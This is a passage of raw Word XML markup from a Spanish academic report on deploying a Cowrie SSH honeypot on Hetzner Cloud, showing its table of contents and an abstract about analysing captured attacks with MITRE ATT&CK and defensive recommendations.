        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Despliegue en Hetzner Cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	51</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pruebas Pendientes en el Servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	54</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	55</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Volumen de la Actividad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	55</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Naturaleza Automatizada de los Ataques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	55</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Origen Geográfico</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	56</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Credenciales</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	57</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Campañas Identificadas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	58</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	59</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Primeras Conclusiones Defensivas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	61</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trabajos Futuros</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	62</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	62</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mejora del Análisis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	62</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Integración y Automatización</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusiones</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	65</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Valoración Personal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	66</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Referencias</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	67</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="276"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	69</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo A. Configuración de Cowrie (cowrie.cfg)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	69</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo B. Credenciales del Honeypot (userdb.txt)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	71</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo C. Configuración del SSH de Administración</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	72</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo D. Servicio de systemd de Cowrie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	73</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo E. Reserva de Memoria (oci-keepalive)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	74</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo F. Script de Bastionado (01_hardening.sh)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	76</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo G. Script de Instalación de Cowrie (02_instalar_cowrie.sh)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	79</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="276"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo H. Script de Redirección (03_redireccion_22.sh)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">	82</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Este proyecto aborda el despliegue y análisis de un honeypot SSH de media interacción basado en Cowrie, expuesto a Internet desde un servidor cloud de Hetzner. El sistema simula un servidor Linux vulnerable para atraer ataques automatizados —principalmente intentos de fuerza bruta, ejecución de comandos y descarga de malware— con el objetivo de estudiar las tácticas, técnicas y procedimientos (TTPs) empleados por los atacantes. Los datos capturados durante un período mínimo de tres semanas se procesan mediante un script Python desarrollado ad hoc que genera rankings de IPs atacantes con geolocalización, credenciales más utilizadas, comandos ejecutados y ficheros descargados. Los hallazgos se clasifican según el marco MITRE ATT&amp;CK y se acompañan de recomendaciones defensivas aplicables a entornos reales. Opcionalmente, los logs se ingestan en Wazuh (SIEM) para su visualización en dashboard. El proyecto demuestra cómo un honeypot de bajo coste proporciona inteligencia de amenazas accionable con herramientas exclusivamente de software libre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Palabras clave: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">honeypot, SSH, Cowrie, inteligencia de amenazas, MITRE ATT&amp;CK, ciberseguridad, fuerza bruta, malware, SIEM, cloud</w:t>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pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
